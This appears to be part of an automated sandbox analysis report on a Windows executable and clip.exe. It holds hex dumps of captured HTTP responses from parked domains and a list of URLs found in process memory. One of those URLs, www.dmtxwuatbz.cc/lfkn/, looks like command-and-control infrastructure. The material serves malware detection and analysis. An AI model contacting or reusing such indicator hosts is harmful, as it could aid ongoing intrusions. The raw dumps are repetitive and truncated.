0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 54 68 65 20 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 21 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 70 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 32 30 70 78 20 30 20 31 30 70 78 20 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 22 20 63 6c 61 73 73 3d 22 61 6c 69 67 6e 2d 63 65 6e 74 65 72 22 3e 41 6c 73 20 44 6f 6d 61 69 6e 69 6e 68 61 62 65 72 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 49 68 72 65 20 44 6f 6d 61 69 6e 73 20 6f 6e 6c 69 6e 65 20 76 65 72 77 61 6c 74 65 6e 2c
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 02 Jul 2024 05:18:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb ec 29 77 a8 82 d0 70 1d df 33 7d cf 75 3c 55 b7 74 75 1d 5f fa 22 50 6e a3 14 46 63 57 85 3d a5 30 d3 40 75 1c d9 28 49 d7 2d 89 5e a0 36 72 79 59 3e 43 8e 22 df b4 c3 10 b3 4c fa 3b 58 49 d6 7a 43 42 34 4c 86 3f ab cb 25 41 2a 84 c6 06 b2 ab ac 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba 7e fe c2 b9 4b e7 d6 8f 59 47 b6 1c af e3 6f 99 51 20 ed fe 1a 37 b8 e8 cb 8e 68 88 8d 91 67 47 90 bf 52 bd 7a 7d e5 88 75 ec f2 e5 e6 31 ab 6e a5 83 a4 83 09 2c 0e cd 1b a5 f9 c3 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 bd 0a 02 3f 38 64 87 9a 58 46 9f 30 b0 1b a5 e2 40 30 4c 66 e8 51 b4 c1 86 7e 66 b9 08 35 b0 1d 69 24 3c b4 6c b3 9d 8a f2 cd d4 1d 24 a3 a5 21 db f6 3b e3 0c dc 6d 63 08 5b 09 fd af 45 e6 6b a5 80 e5 32 86 ee e4 53 ab dd 6d b9 4e b7 17 01 0f 34 96 0a 8a e3 70 e3 56 2b ad a0 21 a7 4a f4 e8 29 ec 3b ce e6 c2 ae 86 e7 47 24 52 a4 ae 60 a2 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 1f ef c5 bb c9 07 c9 0d 7c de c5 ef 5e bc 1d df a1 ea ed 25 af 1d 0e 57 ea 70 48 ed ba 6d 78 82 d7 cf b0 da 8b a2 61 78 d6 b2 e0 7f 26 3c 58 3b 83 e7 6f f8 ae eb 6f 09 cf f7 87 0a 28 c1 07 f8 01 d0 a2 02 e0 59 06 5d f2 eb 56 1b 8e df 87 30 7f a3 d9 cd e4 fd e4 66 dd 92 cd ba 85 75 34 eb 33 8b e9 aa 56 2b 75 76 63 2b 90 43 b8 64 a6 e0 d9 f2 16 fb 62 0b be 00 66 58 d8 88 cd d2 f3 c3 08 3c 62 84 91 8c 1c 1b 06 98 99 75 4a d7 46 3a 3f d9 69 79 a2 8d 19 8b 18 4c 0d a5 c5 d4 d1 5b 6e d6 87 8b bb 77 94 06 32 bc f5 d9 cd 55 6f 07 cd 78 57 5b 2c 7e 42 a6 8c 9f b0 79 1f ec 33 e8 94 d6 87 8b 56 de 1e 45 91 ef 85 99 ca b1 f4 02 0e 74 25 a4 d4 1f 60 07 d7 0f 5a 6c 68 e5 d9 84 b6 b4 22 74 de 53 2d 40 60 20 5d b6 47 aa d6 bc 7f ae c2 b4 3d db 06 cc 5c 18 62 28 3b 1d 58 aa e5 12 78 66 c1 47 34 ad 01 68 6d f5 7c 27 b4 56 ed 9e b2 fb 8d a5 0e 87 8b 05 2c be 24 07 c3 15 74 6b 85 fe 28 b0 55 23 93 82 f8 b9 d4 fc 0d 0d 44 78 14 c5 25 93 fb 14 97 c0 04 5e f0 ca 83 97 d4 f1 07 d2 c9 69 3e 73 9d 82 f4 ba 81 e5 a9 2d 6b 75 14 0d 32 c9 16 2d 80 9a 50 b0 19 0d 32 e1 97 a8 c8 c6 c2 a4 d3 f5 1a 21 d4 e5 75 5a 18 ee e0 b5 c6 ff 00 3c fe 1b ef 88 e4 a3 78 2f f9 24 b9 29 e2 fb 19 41 1c 2d f8 64 38 94 de 1
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 02 Jul 2024 05:18:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb ec 29 77 a8 82 d0 70 1d df 33 7d cf 75 3c 55 b7 74 75 1d 5f fa 22 50 6e a3 14 46 63 57 85 3d a5 30 d3 40 75 1c d9 28 49 d7 2d 89 5e a0 36 72 79 59 3e 43 8e 22 df b4 c3 10 b3 4c fa 3b 58 49 d6 7a 43 42 34 4c 86 3f ab cb 25 41 2a 84 c6 06 b2 ab ac 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba 7e fe c2 b9 4b e7 d6 8f 59 47 b6 1c af e3 6f 99 51 20 ed fe 1a 37 b8 e8 cb 8e 68 88 8d 91 67 47 90 bf 52 bd 7a 7d e5 88 75 ec f2 e5 e6 31 ab 6e a5 83 a4 83 09 2c 0e cd 1b a5 f9 c3 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 bd 0a 02 3f 38 64 87 9a 58 46 9f 30 b0 1b a5 e2 40 30 4c 66 e8 51 b4 c1 86 7e 66 b9 08 35 b0 1d 69 24 3c b4 6c b3 9d 8a f2 cd d4 1d 24 a3 a5 21 db f6 3b e3 0c dc 6d 63 08 5b 09 fd af 45 e6 6b a5 80 e5 32 86 ee e4 53 ab dd 6d b9 4e b7 17 01 0f 34 96 0a 8a e3 70 e3 56 2b ad a0 21 a7 4a f4 e8 29 ec 3b ce e6 c2 ae 86 e7 47 24 52 a4 ae 60 a2 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 1f ef c5 bb c9 07 c9 0d 7c de c5 ef 5e bc 1d df a1 ea ed 25 af 1d 0e 57 ea 70 48 ed ba 6d 78 82 d7 cf b0 da 8b a2 61 78 d6 b2 e0 7f 26 3c 58 3b 83 e7 6f f8 ae eb 6f 09 cf f7 87 0a 28 c1 07 f8 01 d0 a2 02 e0 59 06 5d f2 eb 56 1b 8e df 87 30 7f a3 d9 cd e4 fd e4 66 dd 92 cd ba 85 75 34 eb 33 8b e9 aa 56 2b 75 76 63 2b 90 43 b8 64 a6 e0 d9 f2 16 fb 62 0b be 00 66 58 d8 88 cd d2 f3 c3 08 3c 62 84 91 8c 1c 1b 06 98 99 75 4a d7 46 3a 3f d9 69 79 a2 8d 19 8b 18 4c 0d a5 c5 d4 d1 5b 6e d6 87 8b bb 77 94 06 32 bc f5 d9 cd 55 6f 07 cd 78 57 5b 2c 7e 42 a6 8c 9f b0 79 1f ec 33 e8 94 d6 87 8b 56 de 1e 45 91 ef 85 99 ca b1 f4 02 0e 74 25 a4 d4 1f 60 07 d7 0f 5a 6c 68 e5 d9 84 b6 b4 22 74 de 53 2d 40 60 20 5d b6 47 aa d6 bc 7f ae c2 b4 3d db 06 cc 5c 18 62 28 3b 1d 58 aa e5 12 78 66 c1 47 34 ad 01 68 6d f5 7c 27 b4 56 ed 9e b2 fb 8d a5 0e 87 8b 05 2c be 24 07 c3 15 74 6b 85 fe 28 b0 55 23 93 82 f8 b9 d4 fc 0d 0d 44 78 14 c5 25 93 fb 14 97 c0 04 5e f0 ca 83 97 d4 f1 07 d2 c9 69 3e 73 9d 82 f4 ba 81 e5 a9 2d 6b 75 14 0d 32 c9 16 2d 80 9a 50 b0 19 0d 32 e1 97 a8 c8 c6 c2 a4 d3 f5 1a 21 d4 e5 75 5a 18 ee e0 b5 c6 ff 00 3c fe 1b ef 88 e4 a3 78 2f f9 24 b9 29 e2 fb 19 41 1c 2d f8 64 38 94 de 1
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 02 Jul 2024 05:18:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb ec 29 77 a8 82 d0 70 1d df 33 7d cf 75 3c 55 b7 74 75 1d 5f fa 22 50 6e a3 14 46 63 57 85 3d a5 30 d3 40 75 1c d9 28 49 d7 2d 89 5e a0 36 72 79 59 3e 43 8e 22 df b4 c3 10 b3 4c fa 3b 58 49 d6 7a 43 42 34 4c 86 3f ab cb 25 41 2a 84 c6 06 b2 ab ac 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba 7e fe c2 b9 4b e7 d6 8f 59 47 b6 1c af e3 6f 99 51 20 ed fe 1a 37 b8 e8 cb 8e 68 88 8d 91 67 47 90 bf 52 bd 7a 7d e5 88 75 ec f2 e5 e6 31 ab 6e a5 83 a4 83 09 2c 0e cd 1b a5 f9 c3 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 bd 0a 02 3f 38 64 87 9a 58 46 9f 30 b0 1b a5 e2 40 30 4c 66 e8 51 b4 c1 86 7e 66 b9 08 35 b0 1d 69 24 3c b4 6c b3 9d 8a f2 cd d4 1d 24 a3 a5 21 db f6 3b e3 0c dc 6d 63 08 5b 09 fd af 45 e6 6b a5 80 e5 32 86 ee e4 53 ab dd 6d b9 4e b7 17 01 0f 34 96 0a 8a e3 70 e3 56 2b ad a0 21 a7 4a f4 e8 29 ec 3b ce e6 c2 ae 86 e7 47 24 52 a4 ae 60 a2 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 1f ef c5 bb c9 07 c9 0d 7c de c5 ef 5e bc 1d df a1 ea ed 25 af 1d 0e 57 ea 70 48 ed ba 6d 78 82 d7 cf b0 da 8b a2 61 78 d6 b2 e0 7f 26 3c 58 3b 83 e7 6f f8 ae eb 6f 09 cf f7 87 0a 28 c1 07 f8 01 d0 a2 02 e0 59 06 5d f2 eb 56 1b 8e df 87 30 7f a3 d9 cd e4 fd e4 66 dd 92 cd ba 85 75 34 eb 33 8b e9 aa 56 2b 75 76 63 2b 90 43 b8 64 a6 e0 d9 f2 16 fb 62 0b be 00 66 58 d8 88 cd d2 f3 c3 08 3c 62 84 91 8c 1c 1b 06 98 99 75 4a d7 46 3a 3f d9 69 79 a2 8d 19 8b 18 4c 0d a5 c5 d4 d1 5b 6e d6 87 8b bb 77 94 06 32 bc f5 d9 cd 55 6f 07 cd 78 57 5b 2c 7e 42 a6 8c 9f b0 79 1f ec 33 e8 94 d6 87 8b 56 de 1e 45 91 ef 85 99 ca b1 f4 02 0e 74 25 a4 d4 1f 60 07 d7 0f 5a 6c 68 e5 d9 84 b6 b4 22 74 de 53 2d 40 60 20 5d b6 47 aa d6 bc 7f ae c2 b4 3d db 06 cc 5c 18 62 28 3b 1d 58 aa e5 12 78 66 c1 47 34 ad 01 68 6d f5 7c 27 b4 56 ed 9e b2 fb 8d a5 0e 87 8b 05 2c be 24 07 c3 15 74 6b 85 fe 28 b0 55 23 93 82 f8 b9 d4 fc 0d 0d 44 78 14 c5 25 93 fb 14 97 c0 04 5e f0 ca 83 97 d4 f1 07 d2 c9 69 3e 73 9d 82 f4 ba 81 e5 a9 2d 6b 75 14 0d 32 c9 16 2d 80 9a 50 b0 19 0d 32 e1 97 a8 c8 c6 c2 a4 d3 f5 1a 21 d4 e5 75 5a 18 ee e0 b5 c6 ff 00 3c fe 1b ef 88 e4 a3 78 2f f9 24 b9 29 e2 fb 19 41 1c 2d f8 64 38 94 de 1
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 02 Jul 2024 05:18:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb ec 29 77 a8 82 d0 70 1d df 33 7d cf 75 3c 55 b7 74 75 1d 5f fa 22 50 6e a3 14 46 63 57 85 3d a5 30 d3 40 75 1c d9 28 49 d7 2d 89 5e a0 36 72 79 59 3e 43 8e 22 df b4 c3 10 b3 4c fa 3b 58 49 d6 7a 43 42 34 4c 86 3f ab cb 25 41 2a 84 c6 06 b2 ab ac 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba 7e fe c2 b9 4b e7 d6 8f 59 47 b6 1c af e3 6f 99 51 20 ed fe 1a 37 b8 e8 cb 8e 68 88 8d 91 67 47 90 bf 52 bd 7a 7d e5 88 75 ec f2 e5 e6 31 ab 6e a5 83 a4 83 09 2c 0e cd 1b a5 f9 c3 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 bd 0a 02 3f 38 64 87 9a 58 46 9f 30 b0 1b a5 e2 40 30 4c 66 e8 51 b4 c1 86 7e 66 b9 08 35 b0 1d 69 24 3c b4 6c b3 9d 8a f2 cd d4 1d 24 a3 a5 21 db f6 3b e3 0c dc 6d 63 08 5b 09 fd af 45 e6 6b a5 80 e5 32 86 ee e4 53 ab dd 6d b9 4e b7 17 01 0f 34 96 0a 8a e3 70 e3 56 2b ad a0 21 a7 4a f4 e8 29 ec 3b ce e6 c2 ae 86 e7 47 24 52 a4 ae 60 a2 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 1f ef c5 bb c9 07 c9 0d 7c de c5 ef 5e bc 1d df a1 ea ed 25 af 1d 0e 57 ea 70 48 ed ba 6d 78 82 d7 cf b0 da 8b a2 61 78 d6 b2 e0 7f 26 3c 58 3b 83 e7 6f f8 ae eb 6f 09 cf f7 87 0a 28 c1 07 f8 01 d0 a2 02 e0 59 06 5d f2 eb 56 1b 8e df 87 30 7f a3 d9 cd e4 fd e4 66 dd 92 cd ba 85 75 34 eb 33 8b e9 aa 56 2b 75 76 63 2b 90 43 b8 64 a6 e0 d9 f2 16 fb 62 0b be 00 66 58 d8 88 cd d2 f3 c3 08 3c 62 84 91 8c 1c 1b 06 98 99 75 4a d7 46 3a 3f d9 69 79 a2 8d 19 8b 18 4c 0d a5 c5 d4 d1 5b 6e d6 87 8b bb 77 94 06 32 bc f5 d9 cd 55 6f 07 cd 78 57 5b 2c 7e 42 a6 8c 9f b0 79 1f ec 33 e8 94 d6 87 8b 56 de 1e 45 91 ef 85 99 ca b1 f4 02 0e 74 25 a4 d4 1f 60 07 d7 0f 5a 6c 68 e5 d9 84 b6 b4 22 74 de 53 2d 40 60 20 5d b6 47 aa d6 bc 7f ae c2 b4 3d db 06 cc 5c 18 62 28 3b 1d 58 aa e5 12 78 66 c1 47 34 ad 01 68 6d f5 7c 27 b4 56 ed 9e b2 fb 8d a5 0e 87 8b 05 2c be 24 07 c3 15 74 6b 85 fe 28 b0 55 23 93 82 f8 b9 d4 fc 0d 0d 44 78 14 c5 25 93 fb 14 97 c0 04 5e f0 ca 83 97 d4 f1 07 d2 c9 69 3e 73 9d 82 f4 ba 81 e5 a9 2d 6b 75 14 0d 32 c9 16 2d 80 9a 50 b0 19 0d 32 e1 97 a8 c8 c6 c2 a4 d3 f5 1a 21 d4 e5 75 5a 18 ee e0 b5 c6 ff 00 3c fe 1b ef 88 e4 a3 78 2f f9 24 b9 29 e2 fb 19 41 1c 2d f8 64 38 94 de 1
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 02 Jul 2024 05:18:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 39 38 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 68 65 6c 70 65 72 73 2d 6c 69 6f 6e 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4470199109.00000000080C0000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dmtxwuatbz.cc
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4470199109.00000000080C0000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dmtxwuatbz.cc/lfkn/
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006F78000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005FD8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.domaintechnik.at/data/gfx/dt_logo_parking.png
            Source: clip.exe, 00000004.00000003.2363580118.000000000795E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.000000000660C000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.000000000566C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdf
            Source: clip.exe, 00000004.00000003.2363580118.000000000795E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006DE6000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005E46000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006DE6000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005E46000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006DE6000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005E46000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
            Source: clip.exe, 00000004.00000003.2363580118.000000000795E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: clip.exe, 00000004.00000003.2363580118.000000000795E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.000000000660C000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.000000000566C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd
            Source: clip.exe, 00000004.00000003.2363580118.000000000795E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: clip.exe, 00000004.00000003.2363580118.000000000795E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: clip.exe, 00000004.00000003.2363580118.000000000795E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.000000000729C000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.00000000062FC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
